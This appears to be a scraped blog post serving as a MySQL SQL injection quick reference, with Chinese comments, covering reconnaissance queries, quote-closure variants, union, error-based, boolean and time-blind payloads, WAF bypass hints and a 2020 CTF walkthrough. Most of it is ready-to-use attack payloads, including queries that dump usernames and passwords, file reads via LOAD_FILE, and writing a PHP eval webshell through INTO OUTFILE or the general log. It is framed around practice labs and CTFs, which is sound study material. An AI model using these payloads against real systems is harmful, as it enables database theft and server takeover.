SQL injection quick reference manual (updated from time to time)

Others 2021-02-27 07:51:58 views: null

Article Directory

1 How to use

1.1 Echo data

  • System Information Collection: common usage *to mark

system_user()     系统用户名
user()            MYSQL用户名 
current_user()    当前用户名
session_user()    连接数据库的用户名
database()        当前数据库名(*)
schema()          当前数据库名
version()         当前数据库版本信息
@@version         数据库版本
load_file()       MYSQL读取本地文件(*)

@@datadir         Location of DB files
@@hostname        服务器主机名
@@basedir         MYSQL 安装路径
@@version_compile_os    操作系统
  • Database information collection

-- 查看数据库服务器上的数据库
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA

-- 查看某个数据库里面的数据表
SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema ='数据库名'

-- 查看某个数据表里面的字段
--   默认当前数据库
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name ='表名'
--  指定数据库
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name ='表名' AND table_schema ='数据库名'

-- 查找字段名为id的数据库名和表名
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'id';

-- 权限列表
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;

1.2 Getshell


-- outfile获取shell(union)
select '<?php @eval($_POST["pwd"]) ?>' into outfile '可访问web路径'

-- 开启日志获取shell(堆叠)
-- 查看配置
show variables like 'general%';
-- 开启日志
set global general_log = "ON";
-- 设置路径
set global general_log_file='/Users/littlechieh6/Documents/project/sqli-labs-php7/shell.php';
-- 数据写入
select '<?php phpinfo();?>';

2 Closed way

2.1 Common types

Number, character, bracket type (one side)


)
))
'
')
'))
"
")
"))
`
`)
`))
%
%)
%'
%')
%'))
%"
%")
%`
%`)
%`))

2.2 Closed on both sides

insert cannot directly echo


?id=1'&&sleep(3)&&'1

2.3 Order by型

Verify existence


# 升序排序
?sort=1 asc
# 降序排序
?sort=1 desc

# rand() 验证
?sort=rand(true)
?sort=rand(false)

# 延时验证
?sort=sleep(1)
?sort=(sleep(1))
?sort=1 and sleep(1)

Common ways to use

  • Error injection
  • Boolean injection
  • Delay injection

# 报错1
?sort=1+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

# 报错2
?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,(SELECT+CONCAT_WS(':',username,password)+FROM+users limit 0,1))),1)

# 布尔注入
?sort=rand(left(database(),1)>'r')
?sort=rand(left(database(),1)>'s')

# 延时注入
?sort=rand(if(ascii(substr(database(),1,1))>114,1,sleep(1)))
?sort=rand(if(ascii(substr(database(),1,1))>115,1,sleep(1)))

# 写webshell
?sort=1 into outfile "/var/www/html/less46.txt"
?sort=1 into outfile "/Users/littlechieh6/Documents/project/sqli-labs-php7/less46.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e

3 Press echo type

3.1 Joint injection


-- 判断字段数目
order by 1

-- 联合查询收集信息
union select 
-- 查询当前数据库
UNION SELECT 1,2,database() 
-- 查询所有数据库
UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata 
-- 查询表名
UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() 
-- 查询列名
UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' 
-- 查询字段值
UNION SELECT 1,2,group_concat(id,username,password) from users

3.2 Error injection

Several common types of error injection:

  1. Data types such as BIGINT overflow
  2. xpath syntax error
  3. concat+rand()+group_by() causes duplicate primary key
  4. Some features

Reference: A summary of MYSQL error injection

  • Data overflow

select ~0+1;
select exp(709);
select (select(!x-~0)from(select(select user())x)a);
  • xpath syntax error

select updatexml(1,concat(0x7e,(select @@version),0x7e),1);
select extractvalue(1,concat(0x7e,(select @@version),0x7e));

3.3 Boolean injection


1. 获取当前数据库长度
1" and length(database())>= 11 #()

2. 获取当前数据库名字
1" and substr(database(), 11, 1)="e" #

3. 获取库表的总数(还可以使用length)
1" and (select count(table_name) from information_schema.tables where table_schema=database()) >= 3 #

4. 获取库表的长度
1" and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1) >=0 #

5. 获取库表的名字
1" and substr((select table_name from information_schema.tables where table_schema=database() limit 2,1), {pos}, 1)="{c}" #

6. 获取库表的字段总数
1" and (select count(column_name) from information_schema.columns where table_schema=database() and table_name="the_cfg") >= 2 #

7. 获取库表的字段第2个长度
1" and length((select column_name from information_schema.columns where table_schema=database() and table_name="the_cfg" limit 0,1)) >= 0 #

8. 获取库表的字段第N个字段名
1" and substr((select column_name from information_schema.columns where table_schema=database() and table_name="the_cfg" limit 0,1), {pos}, 1)="{c}" #

9. 获取内容
1" and substr((select cfg_value from the_cfg limit 0,1), {pos}, 1)="{c}" #
注意:substr(str,pos,len);需要注意的是:如果 pos 为 1(而不是0),表示从第一个位置开始。
limit pos,len :从 0 开始,后面的 len 代表长度

3.4 Time blind


# SLEEP
select sleep(5);
# BENCHMARK
select benchmark(10000000,sha(1));
# 笛卡尔积
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
# GET_LOCK
select get_lock('test',5);
# RLIKE
select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');

4 WAF bypass

  1. Double write
  2. Special symbols: such as: %0b
  3. Wide byte
  4. Closed at both ends

Actual combat

The SQL statement used in the Web-SignIn question in n1ctf in 2020. The error function used is the same asexp()


# 查询数据库名字
database()

# 查询数据库信息
SELECT concat(version(),0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,@@version_compile_os)

# 查询文件读取权限
select group_concat(user,0x3a,file_priv) from mysql.user

# 查询当前用户
select user()

# 查询数据库版本
version()

# 查询表名的长度
select length(table_name) from information_schema.tables where table_schema='n1ctf_websign' limit 0,1) < 0

# 查询表名(修改后面的 limit)
select table_name from information_schema.tables where table_schema=DATABASE() limit 1,1

# 判断字段名(修改后面的 limit)
select column_name from information_schema.columns where table_schema=database() and table_name='n1key' limit 0,1

# 查询 ip 表。(边插入边查询,需要使用别名)
SELECT tid FROM (select ip tid from n1ip limit 0,1) AS tt

# 查询某个字段的数据(key 与数据库的关键词相冲突,需要使用别名)
select GROUP_CONCAT(id) FROM n1key
select group_concat(bb.key) from n1key bb
select group_concat(key) FROM (SELECT * FROM n1key) as a
select id from n1key limit 0,1
# 不使用字段名度值
SELECT a.2 FROM (SELECT 1, 2 UNION SELECT * FROM n1key

# 判断是否有数据
SELECT (SELECT key FROM n1key) IS NULL

# 查询文件
SELECT LOAD_FILE('/flag')

appendix

Reference documents:

  1. Mysql injection-wiki
  2. sqli-labs (full clearance brushing notes)-slug01sh
  3. Onebug.org | Security Line

Guess you like

Origin blog.csdn.net/qq_43085611/article/details/112788640
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com